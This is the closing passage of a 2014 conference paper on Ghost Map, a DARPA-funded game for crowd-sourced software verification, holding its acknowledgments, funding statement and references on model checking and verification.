Figure 8. Ghost Map player and proof data from January 2014.
ACKNOWLEDGMENT
Many additional people beyond the named authors on
this paper contributed to Ghost Map, including Bob Emerson, David Diller, David Mandelberg, Daniel McCarthy,
John Orthofer, Paul Rubel, Michelle Spina and Ray Tomlinson at BBN, and additional individuals at the subcontractors
(Breakaway Games, Carnegie Mellon University and the
University of Central Florida). The DARPA leadership and
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
staff associated with the Crowd Sourced Formal Verification (CSFV) Program were also very helpful. Dr. Drew
Dean developed the initial CSFV concept at DARPA and
Dr. Daniel Ragsdale is the current Program Manager. Mr.
Carl Thomas at AFRL is the project funding agent.
This material is based on research sponsored by DARPA
under contract number FA8750-12-C-0204. The U.S. Government is authorized to reproduce and distribute reprints
for Governmental purposes notwithstanding any copyright
218
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
notation thereon. The views and conclusions contained herein are those of the authors and should not be interpreted as
necessarily representing the official policies or endorsements, either expressed or implied, of DARPA or the U.S.
Government.
REFERENCES
[1] Y. Bertot and P. Castéran, Interactive Theorem Proving and
Program Development: Coq Art: The Calculus of Inductive
Constructions, Springer, 2004, XXV, 469 p., ISBN 3-54020854-2
[2] S. Owre, J. Rushby, and N. Shankar, “PVS: A Prototype
Verification System,” in Lecture Notes in Artificial
Intelligence, Volume 607, 11th International Conference on
Automated Deduction (CADE), D. Kapur, Editor, SpringerVerlag, Saratoga, NY, June, 1992, pp 748-752.
[3] E. M. Clarke Jr., Orna Grumberg, and Doron A. Peled,
Model Checking, The MIT Press, 1999.
[4] R. Alur, “Model Checking: From Tools to Theory, 25 Years
of Model Checking,” in Springer Lecture Notes in Computer
Science, Vol. 5000, 2008, pp 89-106.
[5] T. Henzinger, R. Jhala, R. Majumdar, and G. Sutre, “Software
verification with BLAST,” Proceedings of the 10th SPIN
Workshop on Model Checking Software, May 2003, pp 235239.
[6] S. Cooper, et al., “Predicting protein structures with a
multiplayer online game,” Nature, Vol, 466, No. 7307,
August 2010, pp 756-760.
[7] W. Dietl, et al., “Verification Games: Making Verification
Fun,” Proceedings of the 14th Workshop on Formal
Techniques for Java-like Programs, Beijing, China, June
2012, pp 42-49.
[8] W. Li, S. A. Seshia, and S. Jha, CrowdMine: Towards
Crowdsourced Human-Assisted Verification, Technical
Report No. UCB/EECS-2012-121, EECS Department,
University of California, Berkeley, May 2012.
[9] Cancer Research UK, http://www.cancerresearchuk.org/support-us/play-to-cure-genes-in-space, retrieved: Oct, 2014.
[10] Verigames, www.verigames.com, retrieved: Oct, 2014.
[11] H. Chen and D. Wagner, “MOPS: an infrastructure for
examining security properties of software,” Proceedings of
the 9th ACM Conference on Computer and Communications
Security (CCS), Washington, DC, Nov. 2002, pp 235-244.
[12] The MITRE Corp., http://cwe.mitre.org/top25, retrieved: Oct,
2014.
[13] E. M. Clarke, O. Grumberg, S. Jha, Y. Lu, and H. Veith,
“Counterexample-guided abstraction refinement for symbolic
model checking,” Journal of the ACM, Volume 50, Issue 5,
Sept. 2003, pp 752-794.
[14] J. Esparza, D. Hansel, P. Rossmanith, and S. Schwoon,
“Efficient Algorithms for Model Checking Pushdown
Systems,” in Springer Lecture Notes in Computer Science,
Vol. 1855, pp 232–247.
[15] S. Bucur, V. Ureche, C. Zamfir, and G. Candea, “Parallel
Symbolic Execution for Automated Real-World Software
Testing,” ACM SIGOPS/EuroSys European Conference on
Computer Systems (EuroSys 2011), Salzburg, Austria, April,
2011, pp 183-197.
Copyright (c) IARIA, 2014.
Powered by TCPDF (www.tcpdf.org)
ISBN: 978-1-61208-376-6
219